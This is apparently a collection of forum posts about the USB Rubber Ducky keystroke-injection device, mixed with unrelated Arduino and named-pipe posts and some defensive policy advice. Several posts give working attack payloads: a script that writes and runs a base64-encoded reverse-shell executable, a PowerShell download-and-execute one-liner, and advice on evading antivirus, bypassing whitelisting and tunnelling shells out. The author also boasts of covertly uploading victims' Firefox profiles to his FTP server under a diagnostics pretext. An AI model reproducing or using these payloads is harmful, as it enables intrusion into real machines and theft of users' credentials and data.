ApacheTech Consultancy

Is there a more secure password than one you don't even know yourself? Password Prefixing is a form of two-stage authentication. A user-chosen password is prefixed by a given string, much like a password salt. The first action is to generate the prefix string. The best way to garble this so that it is not known is by hashing it. Head over to http://www.adamek.biz/md5-generator.php and generate your token. md5("My Password Prefix") = "b6b8fbc2caf2ff719c7894c83db0b998" Now, we can create the DuckScript based on that MD5 string. DELAY 3000 STRING b6b8fbc2caf2ff719c7894c83db0b998_ Here, I've suffixed the prefix with an underscore to separate the token from the rest of the password. Whenever you register a new password, keep the password box focused and place the Ducky in to input the prefix token, then put the rest of the password. Your password for that site is now: b6b8fbc2caf2ff719c7894c83db0b998_pa$$W0rd Whenever you sign in, place the Duck in the PC and the prefix will be inputted, followed by your own, known password. To create an even more secure token, you can use the Perfect Passwords generator at: https://www.grc.com/passwords.htm to create pseudo-random strings as prefixes, that way, you can't even say to someone "My password is the MD5 hash of "My Password Prefix" followed by Pa$$W0rd". DELAY 3000 STRING EkRjsmp8oNLmwKdLEVXhqLlcls5TQOVTk7mXcj4Km0KMJKAIw920rtsfq0Cevgb_

1. Download Ducky Encoder v2.3 Zipfile and unzip to separate directory. 2. Open Notepad, write a script "DELAY 5000" and safe to the directory your encoder is in as source.txt. 3. Open a command prompt and traverse to that very same directory. 4. Run "java -jar encoder.jar -i source.txt". 5. Copy resulting inject.bin to the root of your FAT/FAT32 formatted MicroSD card. 6. Place the SD Card in the duck. 7. ???? 8. PROFIT

There is a full Wiki here: http://code.google.com/p/ducky-decode/wiki/Index?tm=6 The DuckEncoder_v2.3.zip file is available here: http://code.google.com/p/ducky-decode/downloads/detail?name=DuckEncoder_v2.3.zip&can=2&q= These are the files in the links from the thread I mentioned in the last post. There is also a caveat that says "Compiled under Java 1.7.0 (Will not work on versions of Java below this)." Make sure your Java Libraries are fully up to date. Unless you're running the TwinDuck Firmware, use a card reader to copy the inject.bin to the SD card. You first script should be a ridiculously easy script: DELAY 5000 Nothing else. The indication that it works will be that the light is green or flashing green and yellow. Steady or flashing red means a fault.

Try downloading the Duck Encoder v2.3 from: http://forums.hak5.org/index.php?/topic/27257-encoder-duck-encoder-v23-released-020513/ It can be run from anywhere. So long as the inject.bin ends up on the root of your SD. I just use the folder in my Downloads directory where it was extracted to. I've found it easiest to compile the .bin to the current directory and move it manually to the SD card, by omitting the -o arg on the encoder. Laziness really, as it's less to type. java -jar encoder.jar -l uk -i source.txt If that doesn't work then snake will be able to help you I'm sure. I've streamlined the process even more by adding the above code to a batch file called compile.bat and always calling the script I use source.txt. That way, it's easy just to make changes in Notepad and double click the batch for a new .bin file in the current directory. Don't worry if you think you're over your head with it. I was tearing my hair out for the first day. The SD card was dud so nothing I did worked at all. Then I had fun reflashing it with TwinDuck. But once you get over the teething problems, it's an immensely powerful part of your SE Toolkit. Stick with it. I hope it works for you.

In Windows: Windows Key + R -> "compmgmt.msc" -> Disk Management. Make sure all volumes on the disk read as "Unallocated space". If anything else exists, Right Click -> Delete Volume. On the Unallocated space: Right Click -> Format Make sure the Capacity is just under 512MB. Make sure the File System is set to FAT32 Allocation unit size should be set to default. Lable the device as "DUCKY" Make sure Quick Format is checked. Click Start. I know it's very basic stuff, but if the above does not work then there are either hidden partitions on the disk which Windows cannot handle, or the disk itself is corrupt. This is common, as even some of the cards that shipped with the ducks were corrupt.

Most of the wget executables I use I've used,I've coded myself in Visual Studio. Make a Windows Forms application and delete the form and the contents of Main in Program.cs and code it as if it was a Console Application. It makes the program totally silent. The other way to go would be to use AutoIT, it comes with a huge range of community built scripts that make creating an exploit pretty easy. If you don't have a background in programming, there are multitudes of sites that have pre-built software you can use. Try SecurityXploded or IronGeek. As for hosting, I've simply installed XAMPP on my PC and connect via a DtDNS host. It means I can store the executables on my own PC to create a repository of files that might otherwise have a free hosted account online shut down. Try to keep any executables FUD, but a word of warning... VirusTotal.com actually run any executables that go through as undetected, unsandoxed. I made a sidejacking exe that uploads the victim's Firefox Profile to my FTP site and it was undetected on Virus Total. Five minutes later, my FTP was filling up with files. I deleted the files straight away and changed the password for the FTP account so it wouldn't happen again, but anything more malicious could have had more serious repercussions.

This payload will reset the Flash Counter on a Samsung Galaxy Ace II, getting you your warranty back after installing a custom kernel and firmware. Be EXTREMELY careful. One mistake can brick your phone! Prerequisites: Phone needs to be rooted. Terminal must be open and granted root access by SuperSU. STRING su ENTER STRING dd if=/dev/zero of=/dev/block/mmcblk0 bs=1 count=1 seek=3145732 ENTER There may be ways of upgrading the script to pass through SuperSU if access is not explicitly granted.

As with the point of getting temperatures from the BIOS or from wherever else, the project is majorly about collating Arduino data. I'm basing it in a Server Room because of the nature of the course we're doing and my prior work experience. If I'm honest, measuring temperature is a bit of a cop out with Arduino because it's only three wires and no extra components, just a TMP36. But, it does have a real world application. When I worked as SysAdmin in a college, I got a phone call one Sunday morning at about 4:30 AM: "This is an automated call from the <College Name> Server. A situation has arisen which requires your attention as a key holder. Sensors indicate most probable cause, Fire. Emergency Services have been called. Please attend immediately." I only lived about 10 minutes away and I arrived just before the fire brigade and police turned up. Turned out the cherry blossom outside had clogged all the air vents to the server room. The ambient temperature in the room itself was over 45 degrees and there was blinking lights and alarms going off on everything. Luckily it hadn't done any damage, but that system saved the college, and all its students. I'd like to mimic something like it. I remember we had to constantly check the UPS batteries as well; big heavy bastards that had a tendency to leak if placed to close together and didn't like being moved. Automating that would save a huge amount of time and hassle. And I wanted to find some way of paying homage to Hak5; hence the Throwing Star. I've put a few Technolust easter eggs in a fair few of my assignments so far. :)

I've gone with using a Duplex named pipe for the IPC. It's working steadily, throwing messages out to the client, it's all working quite nicely. But the Wrapper Class I've got for it is not very well written at all and isn't as robust as I'd like. http://www.codeproject.com/Articles/20494/Simple-Managed-Wrapper-for-Windows-Pipes I've been looking for something similar to this, but defensively programmed. I don't really want to get into WCF if possible; Microsoft, yet again, writing 12,000 lines of code so that you can use it in every eventuality, when you only need it for one specific purpose. The MSDN isn't much help either. Their examples leave much to be desired usually. Because it's predominantly a broadcast daemon, I'm putting the emphasis mainly on defensive capabilities of the and fallback methods of the server. The client only ever needs to send two requests; one to connect and one to disconnect. So far as I can tell with the Named Pipes, you can only send data if there is a client connected; only once client can connect at a time and once they disconnect, the pipe doesn't reset itself. I've managed to get around the last with two threads (connection and communication) which just bounce back to one another when a user connected then disconnects.

Hi, For a university assignment, I'm currently writing an application which gathers information given to it by an Arduino device, stores that information in log files which can be read in graphical form and gives a real-time update graph of the results. The application is designed around a Server Room Automated Sensor Array. The Arduino measures the operational temperature of two servers, the ambient temperature of the room, the level of power in the two UPSs and (using a Throwing Star LAN Tap) monitors whether the redundant trunk line is in use or not. If it is, it alerts that the main trunk line is faulty. I would like to code this as two/three separate applications. First will be the backbone. A daemon application which just sits there and collects the information, writes log files and fires off events whenever data is received. The second application will connect to the daemon and listen to the events being fired and update a live streaming graph (Currently using Microsoft Charting). As well as this, or maybe in a third application, it will allow the user to display graphs and data generated from the log files (saved as a 24hour log). I'm using an Event Driven Observer pattern for the whole project. I have the daemon (ardsvrmond.exe) working, perfectly as a Console Application. It just sits there firing off events and writing logs all day long. I'm using the following line keeping it open as a daemon: // Keep the application open to listen to events. new System.Threading.AutoResetEvent(false).WaitOne(); But, now, what is the best way to make an IPC call to or hook on to the ardsvrmond.exe process so that the second application can subscribe to its events?

Yeah, I suppose, USB-RD attacks are never your opening move. SE should always come first, in which case, you'd know more or less what your up against and can script your attacks thusly. On a whitelist based executable environment, can you still you the rundll32 to execute a dll? If not, you could mask it as an internal windows program like Magnifier.exe or bind the executable payload to a whitelisted exe like Winword.exe.

The USB Mass Storage limitations would only come into play if you were using the TwinDuck or similar firmware. But, even if they've blocked off all USB ports with epoxy, one of these will get around that: The whole point of the duck is that it's not a USB Mass Storage Device, it's a USB (or PS2) Keyboard. Robust firewall solutions are ok, but they will not stop a user downloading, for instance a .css file. so reverse.css becomes reverse.exe. If the Windows Run prompt is disabled then you can create a shortcut in windows using context menus to launch the powershell. If powershell is not active, you can write a tiny C# app which acts as a bootstrapper for your download files.

I suppose what I mean is that the script above, for the most part, is the only DuckyScript you will ever need for any use. It's all about the file that you download and execute. The execution script on the duck should be as concise and fast as possible. With this, as soon as the powershell window is open, the key can be removed and the downloaded file can deploy and execute anything it likes. It's automated after that point. For instance, the reverse shell. Rather than writing out the executable in base64, writing a decoder, executing the decoder then executing the shell. You simply wget the shell and execute it. It's the same five lines of code as above with a different file. Rather than the 50 or so lines for the reverse shell script. DELAY 600 ESCAPE ESCAPE DELAY 400 WINDOWS R DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING copy con c:\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\reverse.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe ENTER STRING c:\reverse.exe 172.16.1.7 4444 ENTER STRING exit ENTER Changes to: DELAY 3000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://path.to/reverse.old','%TEMP%\reverse.exe'); Start-Process "%TEMP%\reverse.exe 172.16.1.7 4444" ENTER

Now that the four/five line wget and execute script can grab any program and run it in lightning quick speed: DELAY 3000 GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://path.to/file.old','%TEMP%\file.exe'); Start-Process "%TEMP%\file.exe" ENTER Will the way we write scripts change? I've got a feeling that the focus will move from writing the text script which executes harful code, to writing obfuscated, compressed executables. So the question is, which language? .NET offers the best easy routes to the victim's files and system, but ASM will give the best value for size of application, and the least chance of being caught by AV. AutoIT gives some really quick and simple options, such as the clipboard logger which Mubix showed on the show. Or with Phalanger, you can write WIndows executables in PHP which are almost impossible to reverse engineer. Should the focus now move away from DuckyScript and more to application coding?

Is this script more or less redundant now that the four line wget and execute script is up?

The only "non-swivel" case I've found that fits the duck board is a case from a wireless mouse adapter. It's similar to this one, but where the plug meets the case it has a grey cover that can be removed, and it has a hole through the back to connect to a keyring. It opens by removing the grey plastic cover by the plug and teasing it apart, it can be a bit tricky but it eventually opens with a satisfying snap. :)

If you know of any ports which are open, then yes. Run a port sniffer script on it first which emails the nmap result to you and then set the corresponding port. If the network is configured properly then its SAPs should be stealthed, but sometimes you can get lucky. SAPs between the 5000 - 5100 range can be vulnerable as they are often left open for Passive FTP. Like any network, all you need is a clear SAP path from node to node, it just requires a bit more digging to find it. EDIT: Either that, or if you have access to the network's router, you can add your own NAT signitures, or even designate the vic's device as the network's DMZ. RE-EDIT: The easiest way to do it is set up a remote SSH site which listens on port 80 and forwards it on to you at which ever port you want. You can then send the Reverse Shell to the SSH server using the default HTTP port. The main difficulty with this though, is that it can cause a lot of noticable traffic on the victim's network. If it's a strong network, the packets will be monitored and although they won't be able to be intercepted or read at all, the endpoint will be known. Running processes through SAP80 can set alarm bells off on the network and is not highly recomended, but it is a quick and dirty way of doing it.

I know some of the old AWARD BIOSs only support USB at boot if the "Enable Legacy Devices" option is turned on. The reason I ask is when I was working as a college SysAdmin, to get the computers to boot into the Imaging server, you had to press F12 to enable PXE booting, then hold down CTRL+ALT until it launched into OpenSuse. It slowed the process down so much. If you could add the USB-RD as a network accessible drive, then mass reboot all the PCs to load from that drive, you could almost fully automate the entire process. After 30 seconds, it would launch inject2 which would enter the Multicast Imaging Server IP details and ready the machine for imaging. Once all the machines are ready, you just hit enter on the server. Remove and replace the duck while it's all imaging and compile a new script to log into windows with the default admin credentials, set the computer name based on the MAC, Port or Serial number and change the locale (which is the only bit you need to configure yourself, completely removing en-US from Windows). You could multicast an entire campus from the server room with a single USB-RD. :)

Does the TwinDuck work as a bootable device? So you could boot into Hirens for instance straight from the duck? And if so, could it launch it's payload as well, for instance, load into BIOS or launch into PXE Boot mode?

One thing I've noticed with the TwinDuck is that it can take up to five minutes for the Mass Storage Device to become accessible. My tests so far have ranged between 30 seconds and five minutes; but it's always been after the inject.bin has fired.

Now that the TwinDuck firmware is stable and we have the whole of any MicroSD card to fill up with payloads. I've been thinking of an idea for a White Hat usage for the duck. I'd like to brainstorm it here if possible. The basic premise is that we have a bunch of diagnostics tools on the card and the duck injects a batch file/script to run these various tools sequentially. Once the firmwares evolve, I'm hoping that the TwinDuck and NakedDuck firmwares will merge and allow multiple injections. Your main injection will write and execute the batch file. The second will download, install and run something like HijackThis or other tool. The third will perform some other ancillary action and the forth will write and execute a clean up script. You could also have an inject.bin that writes, compiles and executes it's own inject2-4.bin files, customised to the user's PC. I also have a couple of generic questions: Is it possible to format a MicroSD card with something like YUMI to create a multiboot utility disk and put an inject.bin in the root directory and it still work in the Duck? Is it possible to connect a USB-PS2 adapter and have the duck running through PS2? I have an adapter here, but no PS2 ports in the house to test it on.:p

For more technical policies, you may wish to consider: Windows SteadyState, or a relevant alternative, will protect against backdoor attacks like StickyKeys, Magnifier, UtilMan. Screensavers set to 1 minute that they need to reauthenticate to carry on. Wired Ethernet access to the network should be controlled via a proxy server, so if a rogue device is plugged in, they won't have internet or intranet access. The intranet is usually the most vulnerable node. The internet will have proxies, firewalls and various other monitors that will protect against the vast majority of attacks. Consider the intranet and the extranet as extensions of the internet and protect them thusly. Whilst group policies will protect a vast range of attacks, individual policies should be included as well. Too many times I've seen an AD with purely group policies employed. It can take a while in this case to lock down individual users. Much like defensive programming, assume all data is unsafe and corrupt. Assume all thrid party sources are attacks and assume all users are vulnerable. Other generic advice: Don't bombard your staff or restrict them too greatly as this will lead to them resenting the restrictions and finding ways around them. Personal devices should be logged with IT staff and whitelisted on the MAC table before they are connceted to the network. This includes charging mobile phones from USB ports. More drastic advice: THIS IS NOT RECOMMENDED: The fastest way to affectively lock down a Windows PC is to infect it with malware then cut its connection to the network. You can actually use this technique to vaccinate computers by placing malware on the network with no harmful payload. This will restrict access to the registry, stop the task manager, command prompt, and various other restrictions without doing anything actually harmul to the computer. White Hat "malware" is available which helps reinforce Group Policies on a per machine basis. Software such as Windows SteadyState will re-image the computer and wipe the malware as soon as it is rebooted.

The best way to protect the company as a whole is by promoting a culture of safe practice. The organisation should produce an IT Security Policy by which users of its network must comply. The policy should set standards for proper password usage, management of confidential data, prohibition of personal, unauthorised software and various other restrictions and guidelines; including the need to lock computers when they're not in use and log out of systems whenever possible. Staff should be trained in Social Engineering Awareness. They should be shown, first hand, the power of the USB-RD and the havoc they can cause, even if you leave your screen unlocked for ten seconds while you get the printout from the printer 10ft away. CLAiT users of computers are the most vulnerable. Fast typers, yes, but not very often fast thinkers when it comes to their own, and by proxy, the company's information security. The policy should be enforceable by the standard disciplinary procedures of the organisation and it should be made aware that a breach of the policy will be considered as gross misconduct, with possible legal repercussions for serious breaches. Information security should become a culture of safety and security within the workplace and should be built in to the organisation’s behavioural safety policy. The policy should be part and parcel of the everyday life of employees and customers and should become second nature. Information Security is not just a way of securing data and protecting the organisation from attack; it is also a method for keeping the organisation, the workplace, its employees and customers safe. The Health & Safety officer and Head of Security should, at the very least, be able to pass information on to the relevant IT staff if a breach is suspected. Staff should feel comfortable talking to either of these people, as well as the IT staff if they think their computer has been compromised. The computer should be isolated (I've often thought of having a switch on network ports so you can turn the network access off without unplugging the cable), and should be re-imaged as soon as possible. Deterrence is one way of dealing with things, but sticking USB pens in spare slots or epoxying the ports is a short-term and drastic approach, when a similar investment will protect the company in a much broader and long-term sense.

UPDATE: The USB-RD works perfectly with a 32GB MicroSD. FireFox Extinguisher v0.0.1 Alpha is now working. :-D Now, onwards and upwards to create the ultimate USB (Yumi) Multiboot Utility Key with the TwinDuck Firmware. "Oh don't worry,it's meant to do that, there's a ton of diagnostics programs on there, it's just configuring itself for your system." Which, in essence, it could do. But, in reality, I'm uploading their Firefox profiles to my FTP site.

Just a note, if anyone else has this problem. The MicroSD card itself was extremely difficult to remove from the Duck in which it came packaged. In the end, I had to get a jewellers flat-headed screwdriver to lift up the thin metal locking pin. When the MicroSD finally came away from its housing, there was an audible snap, as of something giving way. I assumed the worst for a moment, but I've checked the Duck with a continuity tester and everything's fine. There was, however, a gold circular sticker, with a plastic peelable cover on the underside of the SD card. My assumption then was that, during transit - or even during initial shipping from the factory - the label became humid and temporarily fused to the casing of the SD socket. I'm unsure as to what after-market service the ducks have to go through, now that they're sold en-masse. If there is a level of after-market service they have to go through, I would suggest shipping the SD card within the card reader, rather than within the duck itself.